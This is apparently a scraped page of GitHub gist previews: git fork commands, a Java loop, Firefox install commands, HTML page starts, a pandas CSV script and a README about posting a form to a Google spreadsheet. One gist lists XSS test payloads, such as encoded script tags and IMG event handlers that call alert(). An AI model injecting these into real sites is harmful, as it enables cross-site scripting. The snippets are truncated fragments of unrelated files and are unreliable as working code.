git clone git@github.com:YOUR-USERNAME/YOUR-FORKED-REPO.git
cd into/cloned/fork-repo
git remote add upstream git://github.com/ORIGINAL-DEV-USERNAME/REPO-YOU-FORKED-FROM.git
git fetch upstream
| class Triangle { | |
| synchronized void drawTriangle(char ch) { | |
| for(int i=0;i<5;i++) { | |
| for(int j=0;j<5;j++) { | |
| System.out.print(ch + " "); | |
| } | |
| System.out.print("\n"); | |
| } |
| sudo add-apt-repository ppa:mozillateam/firefox-next | |
| sudo apt update && sudo apt upgrade | |
| sudo apt install firefox |
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <script src="http://fb.me/react-0.13.0.js"></script> | |
| <meta charset="utf-8"> | |
| <meta name="viewport" content="width=device-width"> | |
| <title>React JS Example</title> | |
| </head> | |
| <body> |
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <meta charset="UTF-8"> | |
| <meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
| <title>My JavaScript Page</title> | |
| </head> | |
| <body> | |
| <script> | |
| var myCounter = 0; |
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <meta charset="UTF-8"> | |
| <meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
| <title>Declare a Function</title> | |
| </head> | |
| <body> | |
| <h1>Declare a function</h1> | |
| <div> |
| #give the path to the csv file as command line arguement | |
| import pandas as pd | |
| import numpy as np | |
| import sys | |
| print("\nPath to the csv file:", sys.argv[1]) | |
| df = pd.read_csv(sys.argv[1]) | |
| df['ATTENDEE'] = df['ATTENDEE'].str.replace(';', '/') | |
| print("Enter Row No.:") | |
| row_no = int(input()) |
This collection of files serves as a simple static demonstration of how to post to a google spreadsheet from an external html <form> following the example by Martin Hawksey
Depreciation Warning: This code is not maintained, and should be seen as reference implementation only. If you're looking to add features or update, fork the code and update as needed.
You should be able to just open index.html in your browser and test locally.